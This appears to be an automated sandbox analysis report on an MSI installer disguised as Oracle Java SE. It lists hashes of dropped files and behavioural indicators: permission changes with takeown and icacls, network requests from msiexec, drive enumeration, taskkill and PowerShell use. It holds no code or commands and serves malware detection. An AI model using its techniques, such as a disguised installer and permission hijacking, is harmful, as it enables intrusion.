C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-runtime-l1-1-0.dll
| MD5 | fb0ca6cbfff46be87ad729a1c4fde138 |
| SHA1 | 2c302d1c535d5c40f31c3a75393118b40e1b2af9 |
| SHA256 | 1ee8e99190cc31b104fb75e66928b8c73138902fefedbcfb54c409df50a364df |
| SHA512 | 99144c67c33e89b8283c5b39b8bf68d55638daa6acc2715a2ac8c5dba4170dd12299d3a2dffb39ae38ef0872c2c68a64d7cdc6ceba5e660a53942761cb9eca83 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-timezone-l1-1-0.dll
| MD5 | c9a55de62e53d747c5a7fddedef874f9 |
| SHA1 | c5c5a7a873a4d686bfe8e3da6dc70f724ce41bad |
| SHA256 | b5c725bbb475b5c06cc6cb2a2c3c70008f229659f88fba25ccd5d5c698d06a4b |
| SHA512 | adca0360a1297e80a8d3c2e07f5fbc06d2848f572f551342ad4c9884e4ab4bd1d3b3d9919b4f2b929e2848c1a88a4e844dd38c86067cace9685f9640db100efb |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l2-1-0.dll
| MD5 | 3f224766fe9b090333fdb43d5a22f9ea |
| SHA1 | 548d1bb707ae7a3dfccc0c2d99908561a305f57b |
| SHA256 | ae5e73416eb64bc18249ace99f6847024eceea7ce9c343696c84196460f3a357 |
| SHA512 | c12ea6758071b332368d7ef0857479d2b43a4b27ceeab86cbb542bd6f1515f605ea526dfa3480717f8f452989c25d0ee92bf3335550b15ecec79e9b25e66a2ca |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-localization-l1-2-0.dll
| MD5 | 23bd405a6cfd1e38c74c5150eec28d0a |
| SHA1 | 1d3be98e7dfe565e297e837a7085731ecd368c7b |
| SHA256 | a7fa48de6c06666b80184afee7e544c258e0fb11399ab3fe47d4e74667779f41 |
| SHA512 | c52d487727a34fbb601b01031300a80eca7c4a08af87567da32cb5b60f7a41eb2cae06697cd11095322f2fc8307219111ee02b60045904b5c9b1f37e48a06a21 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-synch-l1-2-0.dll
| MD5 | 6e704280d632c2f8f2cadefcae25ad85 |
| SHA1 | 699c5a1c553d64d7ff3cf4fe57da72bb151caede |
| SHA256 | 758a2f9ef6908b51745db50d89610fe1de921d93b2dbea919bfdba813d5d8893 |
| SHA512 | ade85a6cd05128536996705fd60c73f04bab808dafb5d8a93c45b2ee6237b6b4ddb087f1a009a9d289c868c98e61be49259157f5161feccf9f572fd306b460e6 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-processthreads-l1-1-1.dll
| MD5 | 95c5b49af7f2c7d3cd0bc14b1e9efacb |
| SHA1 | c400205c81140e60dffa8811c1906ce87c58971e |
| SHA256 | ff9b51aff7fbec8d7fe5cc478b12492a59b38b068dc2b518324173bb3179a0e1 |
| SHA512 | f320937b90068877c46d30a15440dc9ace652c3319f5d75e0c8bb83f37e78be0efb7767b2bd713be6d38943c8db3d3d4c3da44849271605324e599e1242309c3 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l1-2-0.dll
| MD5 | 79ee4a2fcbe24e9a65106de834ccda4a |
| SHA1 | fd1ba674371af7116ea06ad42886185f98ba137b |
| SHA256 | 9f7bda59faafc8a455f98397a63a7f7d114efc4e8a41808c791256ebf33c7613 |
| SHA512 | 6ef7857d856a1d23333669184a231ad402dc62c8f457a6305fe53ed5e792176ca6f9e561375a707da0d7dd27e6ea95f8c4355c5dc217e847e807000b310aa05c |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-heap-l1-1-0.dll
| MD5 | 1776a2b85378b27825cf5e5a3a132d9a |
| SHA1 | 626f0e7f2f18f31ec304fe7a7af1a87cbbebb1df |
| SHA256 | 675b1b82dd485cc8c8a099272db9241d0d2a7f45424901f35231b79186ec47ee |
| SHA512 | 541a5dd997fc5fec31c17b4f95f03c3a52e106d6fb590cb46bdf5adad23ed4a895853768229f3fbb9049f614d9bae031e6c43cec43fb38c89f13163721bb8348 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-string-l1-1-0.dll
| MD5 | ad99c2362f64cde7756b16f9a016a60f |
| SHA1 | 07c9a78ee658bfa81db61dab039cffc9145cc6cb |
| SHA256 | 73ab2161a7700835b2a15b7487045a695706cc18bcee283b114042570bb9c0aa |
| SHA512 | 9c72f239adda1de11b4ad7028f3c897c93859ef277658aeaa141f09b7ddfe788d657b9cb1e2648971ecd5d27b99166283110ccba437d461003dbb9f6885451f7 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-stdio-l1-1-0.dll
| MD5 | d5166ab3034f0e1aa679bfa1907e5844 |
| SHA1 | 851dd640cb34177c43b5f47b218a686c09fa6b4c |
| SHA256 | 7bcab4ca00fb1f85fea29dd3375f709317b984a6f3b9ba12b8cf1952f97beee5 |
| SHA512 | 8f2d7442191de22457c1b8402faad594af2fe0c38280aaafc876c797ca79f7f4b6860e557e37c3dbe084fe7262a85c358e3eeaf91e16855a91b7535cb0ac832e |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-convert-l1-1-0.dll
| MD5 | 9ddea3cc96e0fdd3443cc60d649931b3 |
| SHA1 | af3cb7036318a8427f20b8561079e279119dca0e |
| SHA256 | b7c3ebc36c84630a52d23d1c0e79d61012dfa44cdebdf039af31ec9e322845a5 |
| SHA512 | 1427193b31b64715f5712db9c431593bdc56ef512fe353147ddb7544c1c39ded4371cd72055d82818e965aff0441b7cbe0b811d828efb0ece28471716659e162 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140_1.dll
| MD5 | 1e109b1d40efcfec81a5d43d318cbb26 |
| SHA1 | 03aae193dc36d70fb34257d1276666e988b4a222 |
| SHA256 | 0f04b4cb12543687d8416dfc307593a1dbc450939fd7980d124fed4144732d69 |
| SHA512 | 762bb0fa8528936c8cfbd05e8beb557b9d751f3850124b3dcec102e3cd55550408666ffb27fea5472420ea40d95453279769765eee8f94ed2afa3d721018e1c4 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-locale-l1-1-0.dll
| MD5 | 034379bcea45eb99db8cdfeacbc5e281 |
| SHA1 | bbf93d82e7e306e827efeb9612e8eab2b760e2b7 |
| SHA256 | 8b543b1bb241f5b773eb76f652dad7b12e3e4a09230f2e804cd6b0622e8baf65 |
| SHA512 | 7ea6efb75b0c59d3120d5b13da139042726a06d105c924095ed252f39ac19e11e8a5c6bb1c45fa7519c0163716745d03fb9daaaca50139a115235ab2815cc256 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-filesystem-l1-1-0.dll
| MD5 | 228c6bbe1bce84315e4927392a3baee5 |
| SHA1 | ba274aa567ad1ec663a2f9284af2e3cb232698fb |
| SHA256 | ac0cec8644340125507dd0bc9a90b1853a2d194eb60a049237fb5e752d349065 |
| SHA512 | 37a60cce69e81f68ef62c58bba8f2843e99e8ba1b87df9a5b561d358309e672ae5e3434a10a3dde01ae624d1638da226d42c64316f72f3d63b08015b43c56cab |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-time-l1-1-0.dll
| MD5 | 9b79fda359a269c63dcac69b2c81caa4 |
| SHA1 | a38c81b7a2ec158dfcfeb72cb7c04b3eb3ccc0fb |
| SHA256 | 4d0f0ea6e8478132892f9e674e27e2bc346622fc8989c704e5b2299a18c1d138 |
| SHA512 | e69d275c5ec5eae5c95b0596f0cc681b7d287b3e2f9c78a9b5e658949e6244f754f96ad7d40214d22ed28d64e4e8bd507363cdf99999fea93cfe319078c1f541 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-environment-l1-1-0.dll
| MD5 | 39325e5f023eb564c87d30f7e06dff23 |
| SHA1 | 03dd79a7fbe3de1a29359b94ba2d554776bdd3fe |
| SHA256 | 56d8b7ee7619579a3c648eb130c9354ba1ba5b33a07a4f350370ee7b3653749a |
| SHA512 | 087b9dcb744ad7d330bacb9bda9c1a1df28ebb9327de0c5dc618e79929fd33d1b1ff0e1ef4c08f8b3ea8118b968a89f44fe651c66cba4ecbb3216cd4bcce3085 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-math-l1-1-0.dll
| MD5 | 8da414c3524a869e5679c0678d1640c1 |
| SHA1 | 60cf28792c68e9894878c31b323e68feb4676865 |
| SHA256 | 39723e61c98703034b264b97ee0fe12e696c6560483d799020f9847d8a952672 |
| SHA512 | 6ef3f81206e7d4dca5b3c1fafc9aa2328b717e61ee0acce30dfb15ad0fe3cb59b2bd61f92bf6046c0aae01445896dcb1485ad8be86629d22c3301a1b5f4f2cfa |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-utility-l1-1-0.dll
| MD5 | 70e9104e743069b573ca12a3cd87ec33 |
| SHA1 | 4290755b6a49212b2e969200e7a088d1713b84a2 |
| SHA256 | 7e6b33a4c0c84f18f2be294ec63212245af4fd8354636804ffe5ee9a0d526d95 |
| SHA512 | e979f28451d271f405b780fc2025707c8a29dcb4c28980ca42e33d4033666de0e4a4644defec6c1d5d4bdd3c73d405fafcffe3320c60134681f62805c965bfd9 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll
| MD5 | b3c188281aa3998f49391da0c3b52b8e |
| SHA1 | 67e6f1eb07861dddde3df9d266f683cb0331d433 |
| SHA256 | 59481427f4dad6460ac60c7619f628d6b7fad33562bbd8dc9145715ebb300e46 |
| SHA512 | 42d7a71d4ce1e0c6ea50ddbf960b6f0d25b32526604295f50688bf4770db7338d4b32f0dda738ae147def66788497537f708becdeb720e299c614c28fe824665 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll
| MD5 | 888aa12cc20f645dd2fc04f52e453bc6 |
| SHA1 | b19e790c9e6ceface9cdd41a24518d6e4a953b23 |
| SHA256 | 93e2aa20251e1a0485828c3e29b60e17ff2f3ec1285455d059ffe1b1a24518eb |
| SHA512 | f7d7a67244ff4f9a269461b49cdcd44d923840154447ca7ace61ef8167b79605c2f3c29a1d607b44831e68a696ef219710c4f1658a6fa73e564b7f252b031dc3 |
C:\Config.Msi\f77c94a.rbs
| MD5 | 83368ac0b481e890e8d9fd0336d43875 |
| SHA1 | f48b75fec1ce419fa8ca15cb017ed4a7e7b1da74 |
| SHA256 | feb491b96103b94b4582987a7f9a978909a9bb4274edc8f133002e5a296b57f2 |
| SHA512 | 27e7922c94e48d1cacd26cca7688b4b45246e22b7c3fb12c5231649459f9183fa0f02665fd736241397ada25d2929d15f5f0211d519534dbbfed0a009ae4b3d2 |
C:\Windows\Installer\f77c948.msi
| MD5 | 4c11285fc4be4ffa97a866fbc13bbd83 |
| SHA1 | 67230603c53081c6436658c3e7b90048a61cb5ed |
| SHA256 | f8cf786235acc09140f9f2b21f61d2f2886f2592afb814b29bffd5550be849e9 |
| SHA512 | 4f8654d49aa571890473ffb4743dbeee311efbbec09fec307fbcf4803041c976dde0711a72865820edbc5b94487609622adbd9d7694dc8394eee44a5821ef4e1 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
| MD5 | 96b62cfb83cf0e9790a3ef939173ee31 |
| SHA1 | 23ecaefa21524e9446ea16e1f532f8bf9c5a56f1 |
| SHA256 | 6fe23163ea43ab8d9e84fed45b8590fe643d599c7f218ea05d505e3aeea86f23 |
| SHA512 | d018997c50702fe035bd3974180f274ffa34605bd19a3ce8fbabf96633794afe8f1ee4a2ee731a9ff3c73163e45ad26f8d7bac30b9ae55d1d47c8a333b657b6b |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll
| MD5 | a3ba8128253c2f6bf043d636100d62de |
| SHA1 | f47a211b1d09d75ff820d2c2e2fd9fa0338562a5 |
| SHA256 | 599f9c72db7ba72b2d13c222f9121d7b564fbd0b401be44bd05a660e43d93bce |
| SHA512 | 89f2d39a507a40bbf096fd10816b901c472ce5b184b7de70d9d80c97f42db5029e877201df7abd828c4f475d279617d4e24b673608136659a9602cf14385f5ae |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll
| MD5 | e7fcab954f116c8bb4b006145c20dd23 |
| SHA1 | 91ee70a33ab12618f0f0ec229de4583d9aa52a8a |
| SHA256 | e52b21f458c61dab957fea7286544a0c6531a4caf5c97c323eea10a61a0b38b2 |
| SHA512 | d5cf56a35697b4afd88721f7c60156fd5b1ef7b659e8fe5e98db79f8fa41b394662bc4182b41af1a5a029ec3b04c909629db83d146683ca382958199f6ea73b9 |
memory/1168-220-0x000007FEF5960000-0x000007FEF5DE0000-memory.dmp
memory/1168-221-0x000007FEF5960000-0x000007FEF5DE0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-16 08:21
Reported
2024-10-16 08:24
Platform
win10v2004-20241007-en
Max time kernel
142s
Max time network
122s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-environment-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-time-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l2-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-processthreads-l1-1-1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-locale-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-timezone-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-conio-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\msvcp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-math-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-string-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-stdio-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-utility-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l1-2-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-filesystem-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-runtime-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-synch-l1-2-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-private-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-process-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-localization-l1-2-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-convert-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-heap-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-multibyte-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\e57762a.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48} | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7772.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e57762c.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}\Logo.ico | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}\Logo.ico | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7BDA.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e57762a.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI77C1.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI79E5.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\wix{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}.SchedServiceConfig.rmi | C:\Windows\syswow64\MsiExec.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
Loads dropped DLL
Event Triggered Execution: Installer Packages
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\takeown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
